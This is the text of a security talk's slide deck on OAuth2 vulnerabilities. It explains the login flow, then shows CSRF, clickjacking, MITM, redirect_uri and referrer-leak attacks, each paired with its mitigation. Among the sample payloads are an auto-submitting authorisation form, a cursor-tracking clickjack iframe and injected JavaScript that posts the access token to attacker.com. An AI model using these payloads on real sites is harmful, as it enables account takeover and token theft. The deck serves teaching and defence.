OAuth2 Vulnerabilities

OAuth2 Vulnerabilities @tam7t 2

Example Flow example.com implements facebook login 3

Client Resource / Authorization Server Login Initiate Flow Callback Login
Authorize Auth Prompt Do Thing Yeah, Do Stuff Token 4

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token 5

Username: Password: Login Login with Facebook example.com 6

Username: stuff Password: ************* Login Login with Facebook example.com 7

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Initiate Flow 8

Connect with Facebook example.com Account Settings 9

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token GET: facebook.com/oauth/authorize?client_id=<id>&scope=<scope>&redirect_uri=<asdf>&state=<state> Authorize 10

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token GET: facebook.com/oauth/authorize?client_id=<id>&scope=<scope>&redirect_uri=<asdf>&state=<state> Authorize Need to login? Need to accept scope permissions? 11

Client Resource / Authorization Server Initiate Flow Callback Login Authorize
Auth Prompt Do Thing Yeah, Do Stuff Token Login Login 12

Username: Password: Login facebook.com 13

Auth Prompt Do Thing Yeah, Do Stuff Token Login Auth Prompt 14

Approve facebook.com Example.com would like to… - Post to your
feed - Eat your first born Deny 15

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Authorize 16

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Authorize HTTP 302: <redirect_uri>?code=<code>&state=<state> 18

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Authorize HTTP 302: <redirect_uri>#access_token=askldfjasdf&state=<state> 19

Codes and Tokens ?code exchanged for token ◦ requires client
to authenticate to receive an access_token ◦ URL parameter, browser sends to redirect_url #access_token used directly ◦ URL hash, browser does not send to redirect_url ◦ parsed with javascript 20

Auth Prompt Do Thing Yeah, Do Stuff Token Login Callback GET: <redirect_uri>?code=<code>&state=<state> GET: <redirect_uri> 21

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Token 22

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Do Thing Yeah, Do Stuff 23

Disconnect Facebook example.com Do things Account Settings Facebook Account Connected!
24

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token GET: facebook.com/oauth/authorize?client_id=<id>&scope=<scope>&redirect_uri=<asdf>&state=<state> Authorize 26

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token GET: facebook.com/oauth/authorize?client_id=<id>&scope=<scope>&redirect_uri=<asdf>&state=<state> Authorize Need to login? Need to accept scope permissions? 27

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Authorize HTTP 302: <redirect_uri>?code=<code>&state=<state> 29

Auth Prompt Do Thing Yeah, Do Stuff Token Login Callback GET: <redirect_uri>?code=<code>&state=<state> 30

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Token 31

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Do Thing Yeah, Do Stuff 32

example.com Doing Things Post to Facebook 33

Attack #1 34

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token GET: facebook.com/oauth/authorize?client_id=<id>&scope=<scope>&redirect_uri=<asdf>&state=<state> 35 Initiate Flow

Auth Prompt Do Thing Yeah, Do Stuff Token Login Callback HTTP 302: <redirect_uri>?code=<code>&state=<state> 36

Auth Prompt Do Thing Yeah, Do Stuff Token Login Initiate Flow 37 GET: facebook.com/oauth/authorize?client_id=<id>&scope=<scope>&redirect_uri=<asdf>&state=<state>

Auth Prompt Do Thing Yeah, Do Stuff Token Login Authorize 38

Auth Prompt Do Thing Yeah, Do Stuff Token Login Authorize 39

Auth Prompt Do Thing Yeah, Do Stuff Token Login Authorize 40 HTTP 302: <redirect_uri>?code=<code>&state=<state>

Auth Prompt Do Thing Yeah, Do Stuff Token Login Callback 41 GET: <redirect_uri>?code=<code>&state=<state>

verify state <img src = ‘https://example.com/callback? code=<attacker’s code>’ /> 42

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: facebook.com/oauth/authorize?...&state=<state> Initiate Flow 44

Auth Prompt Do Thing Yeah, Do Stuff Token Login 45 Callback HTTP 302: <redirect_uri>?code=<code>&state=<state>

no really, verify state def callback if params[:state] == session[:state]
# associate accounts end end 46

# associate accounts end end What is session[:state] if the request is not authentic? 47

# associate accounts end end What is session[:state] if the request is not authentic? <img src = ‘https://example.com/callback? code=<attacker’s code>’ /> Ensure state is set (and not predictable) 48

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Initiate Flow 50

Connect with Facebook example.com Account Settings 51

CSRF initiating the flow - Log victim into attacker’s facebook.com
(CSRF) - Attacker’s facebook.com account has accepted example.com permissions <img src=’example.com/facebook/connect’> - Victim’s browser happily redirects through to example. com’s callback - associating accounts - Victim’s example.com account is now linked to attacker’ s facebook.com account 52

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: example.com/facebook/connect -> 302 Redirect to facebook.com/oauth/authorize Initiate Flow 53

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: example.com/facebook/connect -> 302 Redirect to facebook.com/oauth/authorize Initiate Flow 54 GET: facebook.com/oauth/authorize?client_id=<id>&scope=<scope>&redirect_uri=<asdf>&state=<state>

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: example.com/facebook/connect -> 302 Redirect to facebook.com/oauth/authorize Authorize 55

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: example.com/facebook/connect -> 302 Redirect to facebook.com/oauth/authorize Authorize 56

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: example.com/facebook/connect -> 302 Redirect to facebook.com/oauth/authorize GET: facebook.com/oauth/authorize -> 302 Redirect to example.com/callback Authorize 57

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: example.com/facebook/connect -> 302 Redirect to facebook.com/oauth/authorize GET: facebook.com/oauth/authorize -> 302 Redirect to example.com/callback GET: example.com/callback?code=<code>&state=<state> Callback 58

Real World - 5 Mar 2015 • booking.com • bit.ly
• about.me • stumbleupon • angel.co • mashable.com • vimeo.com 60

CSRF Protection https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet Client: CSRF all state-changing endpoints… example.
com/facebook/connect Auth Server: Always require re-authentication Auth Server: Always require re-authorization 61

Auth Prompt Do Thing Yeah, Do Stuff Token Login Auth Prompt 63

feed - Eat your first born Deny 64

feed - Eat your first born Deny What can we exploit here?! 65

CSRF Permissions Approval Doorkeeper <form action="https://facebook.com/v1/oauth/authorize?response_type=code" method="POST"> <input name="client_id" value="BAD_GUY_APP_ID"
/> <input name="redirect_uri" value="http://attacker.com/callback" /> <input name="scope" value="ANY SCOPE" /> </form><script>document.forms[0].submit()</script> http://homakov.blogspot.com/2014/12/blatant- csrf-in-doorkeeper-most-popular.html 66

feed - Eat your first born Deny What else?! 67

feed - Eat your first born Deny Can we trick a user into accidentally clicking ‘Approve’? 69

- Put hidden iframe under mouse - On click, facebook.com
will authorize example. com access to the victim’s data Clickjack Permissions Approval 70

Clickjack Permissions Approval - Victim is logged in to facebook.com
- attacker has an evil facebook.com app <style> #evil { opacity: 0.01; } <style> <script> $(document).bind(‘mousemove’, function(e){ $(‘#evil’).css({left: e.pageX - 123, top: e.pageY - 456}); }); </script> <iframe id=’evil’ src= ‘facebook.com/oauth/authorize?client_id=<id>&scope=<scope>...’/> 71

- https://www.owasp.org/index. php/Clickjacking_Defense_Cheat_Sheet - X-Frame-Options HTTP header (old) - Content-Security-Policy:
frame-options ‘deny’ Clickjack Permissions Approval 72

Auth Prompt Do Thing Yeah, Do Stuff Token Login Callback GET: <redirect_uri>?code=<code>&state=<state> 74

Auth Prompt Do Thing Yeah, Do Stuff Token Login Callback GET: http://example.com?code=<code>&state=<state> 75

http redirect_uri Given: user has associated facebook.com with example.com MITM
injects CSRF into an HTTP response <img src = ‘facebook.com/oauth/authorize? client_id=<id>& scope=<scope>& response_type=code& redirect_uri=http://example.com/oauth/callback>’/> 76

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: facebook.com/oauth/authorize Authorize 77 attacker.com

Auth Prompt Do Thing Yeah, Do Stuff Token Login attacker.com GET: facebook.com/oauth/authorize Authorize 78

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: facebook.com/oauth/authorize attacker.com Authorize 79

Auth Prompt Do Thing Yeah, Do Stuff Token Login attacker.com Authorize 80 GET: facebook.com/oauth/authorize -> 302 Redirect to http://example.com/callback

Auth Prompt Do Thing Yeah, Do Stuff Token Login GET: facebook.com/oauth/authorize -> 302 Redirect to http://example.com/callback Token attacker.com 81 GET: http://example.com/callback?code=<code> Callback

How to use code without knowing client_secret? 82

MITM blocks victim’s GET example.com/callback Attacker makes a request to
example. com/callback with the victim’s code Attacker’s example.com is now associated with victim’s facebook.com http redirect_uri 83

How to steal access_token? It’s not sent as part of
the request! 84

MITM injects following in example.com’s callback <script> $.ajax({ type: “POST”,
url: “attacker.com”, data: window.location.hash }) </script> injected javascript 85

Enforce HTTPS redirect_uri solution 86

Authorize Auth Prompt Do Thing Yeah, Do Stuff Token Authorize and... 87

arbitrary redirect_uri If facebook.com does not validate redirect_uri... <img src
= ‘facebook.com/oauth/authorize? client_id=<id>& scope=<scope>& response_type=<code/token>& redirect_uri=https://attacker.com>’/> attacker.com now has user’s facebook creds 89

arbitrary redirect_uri Exact match of redirect_uri 90

mailchimp evernote allow variations on redirect_uri 92

Auth Prompt Do Thing Yeah, Do Stuff Token Login 93 ?n=attack.com

Auth Prompt Do Thing Yeah, Do Stuff Token Login 94 attack.com ?n=attack.com

Auth Prompt Do Thing Yeah, Do Stuff Token Login 95 attack.com ?n=attack.com URL: attack.com#access_token=<token>

open redirects Can be serious vulns when: - oauth client
- provider does not strictly check redirect_uri Mitigations: - redirect with #_=_ 96

Auth Prompt Do Thing Yeah, Do Stuff Token Login 98 blah

example.com 404: Blah does not exist Return Home 99

Auth Prompt Do Thing Yeah, Do Stuff Token Login blah 100 twitter.com

referral leakage GET / … Referrer: example.com/callback?code=asdf 101 - social
links: twitter / facebook / … - forum links, shared posts, etc.

referral leakage <meta name="referrer" content="no-referrer"> Content-Security-Policy: referrer no-referrer; Link sanitizer
102

Overview • callback CSRF • init CSRF • approval CSRF
• approval clickjack • http MITM (confidentiality) • arbitrary redirect_uri (input validation) • open redirect • referral leakage 103

Thanks! 104

References 105 • https://hackerone.com/reports/11209 • https://prakharprasad.com/facebook-mailchimp-application-oauth-2-0-misconfiguration/ • https://tools.ietf.org/html/rfc6819 • http://www.bubblecode.net/en/2013/03/10/understanding-oauth2/
• https://aaronparecki.com/articles/2012/07/29/1/oauth2-simplified • http://homakov.blogspot.com/2014/12/blatant-csrf-in-doorkeeper-most-popular.html • http://homakov.blogspot.com/2013/03/redirecturi-is-achilles-heel-of-oauth.html • https://apidocs.mailchimp.com/oauth2/ • https://dev.evernote.com/doc/articles/authentication.php • https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options • http://stephensclafani.com/2009/05/04/clickjacking-oauth/

OAuth2 Vulnerabilities

OAuth2 Vulnerabilities

More Decks by Tommy Murphy

Other Decks in Programming

Featured

Transcript